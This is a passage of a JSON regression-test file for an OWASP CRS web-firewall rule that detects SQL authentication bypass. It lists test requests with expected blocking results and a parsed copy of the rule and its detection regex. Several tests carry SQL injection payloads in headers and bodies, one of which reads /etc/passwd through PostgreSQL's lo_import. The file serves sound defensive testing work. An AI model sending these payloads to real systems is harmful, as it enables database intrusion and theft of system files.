40%22%21%21%21%21%27%27%21%21%21%21%21%22%60%27%21%21%21%27..%60%40%60%21%21%21%21%21%27%60%27%21%21%27%21%21%21%60%21%21%21%21%27%40%60%22%21%60.....%27%40%40%40%40%40%27.....%60%21%21%60%40%40%40%27...%60%21%21%21%60%40%40%40%22%22%21%21%21%21%21%22%40%40%40%40%27%40%22.%22.%22%40%40%40%40%40%22%40%60....%60....%27%21%21%21%21%21%22%21%21%21%21%60%21%21%21%21%21%27....%27%21%21%21%21%60%22%60%40%40%40%40%40%60...%22%40%60%40%40%22%40%40%40%40%40%27%21%21%27%22%40%40%60%27%22%40%40%40%22%21%60%27%21%21%21%21%21%60...%27%40%40%22%21%21%21%27%21%27%21%21%21%60%21%21%21%21%21%60%22.....%22%21%21%21%21%27%40%40%40%40%60%21%21%27.....%22%21%21%21%22%21%21%22%21%21%22%40%40%27%21%21%21%21%22%40%40%40%40%27%40%40%40%40%27....%60%40%40%40%60%40%22...%27.....%27%40%40%22%40%40%40%22%21%21%21%21%21%22...%27..%22%21%22%40%40%40%40%40%27....%60%40%40%40%40%22%27%21%21%21%21%21%60%40%40%22%27%40%40%40%40%40%60%21%21%21%27%40%40%40%27%60.%27%21%21%21%22....%60%40%27.....%22%40%40%40%40%40%27%40%60%40%40%40%40%60%40%40%40%60%21%21%21%21%21%60%27%21%21%21%27....%22%22%21%21%27...%27%21%21%21%27...%27%40%22....%22%40%40%27%21%21%21%21%27.....%22%40%40%40%40%27%22....%22...%27%21%21%21%60....%22%40%40%40%22...%27%40%27..%60%21%21%27%40%40%40%40%40%60%40%60%21%21%21%21%21%27.....%60%27%22%22%27%27.%22%60%21%21%22%40%40%60%21%22%60%21%21%27..%60%21%21%21%21%60%21%21%21%21%21%60%40%40%22%21%21%21%21%21%60%40%40%60....%60%40%40%40%40%40%22%40%40%40%40%60.....%60%27%27...%27%22%22%40%40%60.....%22%22%27%40%60%27%27.....%22%40%27%60.....%60%40%22%40%40%40%40%27%21%21%21%21%60%40%40%40%27%40%40%40%40%40%22%21%21%21%21%60.%22%21%21%27%40%27%22%21%21%21%21%60%40%40%27%40%40%40%40%27%21%21%27%27..%27%27%21%21%21%21%21%27%40%27.%60%21%21%21%21%21%27%40%40%40%40%27%21%21%27%40%40%40%40%22...%22%60%27%40%40%40%22%40%40%40%22%22%21%21%21%22%21%21%60...%27.....%60%40%40%40%60%21%21%21%60%40%40%40%40%40%22%22%21%21%21%60%21%21%21%21%21%27%27%21%21%21%21%22....%27%21%21%21%21%21%27%21%21%21%22%21%21%21%21%21%27%22....%60%27%40%40%27%21%27.....%22%21%22%21%21%21%21%21%22%21%21%21%21%22...%27%22%40%40%40%60%40%40%40%40%40%27%27%21%21%27....%22.....%22%21%21%21%22%40%40%40%40%40%27%21%21%21%21%60%22.....%60..%60%22%21%21%21%22%22%27...%27%40%40%40%40%27.....%27%21%21%21%60...%27.%22%21%21%21%21%21%27%21%27%21%21%21%22%40%27.....%27%21%21%21%21%22%40%27...%27%21%21%27%40%40%22%40%40%40%40%40%60..%27%21%27.....%22%22%21%21%21%21%21%27%40%40%40%40%22%40%40%40%60.....%60%21%21%21%21%21%27....%27%27%40%40%40%40%27.....%27%21%60....%22...%22%21%21%21%21%27%21%21%22%40%27%40%40%40%40%40%27%21%21%21%22%21%21%21%21%27%21%21%21%21%60%27%27..%22%22%21%21%21%27%22%21%60..%22%27%27%60..%22%21%22%21%21%21%21%21%27..%27..%27.%27%27%21%21%21%21%60%27%21%21%21%21%60..%27%21%21%22.....%22%21%21%21%21%27%21%21%21%27....%60.....%22...%22%22%22.%22%27.%60%21%21%21%21%22%60%40%22.....%27%21%21%21%21%22%40%60...%22.%22.....%27%27..%22%27%21%21%21%21%21%60....%22%21%21%21%22..%60%21%21%21%21%60%21%21%21%21%27....%60%27%40%40%40%22%27.%27....%22%40%40%40%60%21%21%21%21%22%40%40%40%40%40%27%21%21%21%60%40%40%40%40%60.%22..%22%40%40%22%21%60%22%21%21%21%21%27%27%27.%27%22%40%40%40%22%40%40%40%27....%22%21%21%21%21%21%22%21%21%21%21%22%21%27%60%27%21%21%21%60%21%27...%60%21%21%21%21%27...%27%40%40%40%40%40%60%21%21%60%21%21%21%22%40%60%40%40%40%40%40%60%27%60..%22%22%21%21%27%22%40%40%27...%22..%22....%22%27%60%40%40%27....%27%40%40%40%40%22%60%21%21%60.%60%40%27%21%60%21%22...%27...%27.....%27%21%21%22..%22%22%40%27%21%21%21%27%40%40%22.%27%21%21%21%60%40%60%60%21%21%21%60%21%21%22...%27.%22%21%21%21%27...%22%21%21%21%21%60%40%40%40%40%60%22.%27%21%21%60.....%60%21%21%60%21%21%21%21%21%27.%27%40%40%40%40%40%22%21%21%21%60..%27%21%21%21%21%21%27%21%21%60%40%40%27%21%21%21%27.%22%21%21%21%21%22.%22%40%40%40%40%40%22%21%21%21%22%21%21%22%22%21%21%21%60%27%21%21%60%40%40%40%40%40%27..%27%40%60.....%22%21%21%21%27.%27%21%21%21%21%27%27....%22%40%40%27%40%40%40%40%40%60%60or" } ] }, { "description": "Performance test", "test_id": 18, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var='.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'or" }, "expected": { "should_block": true, "rule_ids": [ 942521 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var='.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'or" } ] }, { "description": "Negative test: performance test", "test_id": 19, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'or" }, "expected": { "should_block": false, "rule_ids": [ 942521 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'or" } ] }, { "description": "Detect admin%40juice-sh.op'and%20likely%20(id)--", "test_id": 20, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "admin%2540juice-sh.op%5C%27and%2520likely%2520%28id%29--" }, "expected": { "should_block": true, "rule_ids": [ 942521 ] }, "malicious_patterns": [ { "location": "post_body", "value": "admin%2540juice-sh.op%5C%27and%2520likely%2520%28id%29--" } ] }, { "description": "Detects odd number of quotes in request headers", "test_id": 21, "request": { "method": "GET", "uri": "/get", "headers": { "Host": "localhost", "User-Agent": "1' and starts_with(password) and 'true", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942521 ] }, "malicious_patterns": [] }, { "description": "Detects odd number of quotes in request headers", "test_id": 22, "request": { "method": "GET", "uri": "/get", "headers": { "Host": "localhost", "User-Agent": "1' and lo_import('/etc' || '/pass' || 'wd')::int::bool and 'true", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942521 ] }, "malicious_patterns": [ { "location": "header_user-agent", "value": "1' and lo_import('/etc' || '/pass' || 'wd')::int::bool and 'true" } ] }, { "description": "Detects odd number of quotes in request headers", "test_id": 23, "request": { "method": "GET", "uri": "/get", "headers": { "Host": "localhost", "User-Agent": "1' and lo_get(16400)::text::bool and 'true", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942521 ] }, "malicious_patterns": [] }, { "description": "Detects odd number of quotes in request headers", "test_id": 24, "request": { "method": "GET", "uri": "/get", "headers": { "Host": "localhost", "User-Agent": "1'and json_search (json_array(password),0b11000010110110001101100,'t_______________')#", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942521 ] }, "malicious_patterns": [ { "location": "header_user-agent", "value": "1'and json_search (json_array(password),0b11000010110110001101100,'t_______________')#" } ] }, { "description": "Integration test: 942521 blocks foo'or'oof", "test_id": 25, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=foo'or'oof" }, "expected": { "should_block": true, "rule_ids": [ 942521 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=foo'or'oof" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 1526, "variables": [ { "variable": "REQUEST_HEADERS", "variable_part": "User-Agent", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_HEADERS", "variable_part": "Referer", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)^(?:[^']*?(?:'[^']*?'[^']*?)*?'|[^\\\"]*?(?:\\\"[^\\\"]*?\\\"[^\\\"]*?)*?\\\"|[^`]*?(?:`[^`]*?`[^`]*?)*?`)[\\s\\x0b]*([0-9A-Z_a-z]+)\\b", "actions": [ { "act_name": "id", "lineno": 1527, "act_quote": "no_quote", "act_arg": "942521", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1528, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 1529, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 1530, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1531, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1531, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 1532, "act_quote": "quotes", "act_arg": "Detects basic SQL authentication bypass attempts 4.1/4", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 1533, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{TX.942521_MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1534, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1535, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1536, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1537, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1538, "act_quote": "quotes", "act_arg": "paranoia-level/2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1539, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1540, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1541, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1542, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 1543, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1544, "act_quote": "quotes", "act_arg": "tx.942521_matched_var_name=%{matched_var_name}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "chain", "lineno": 1545, 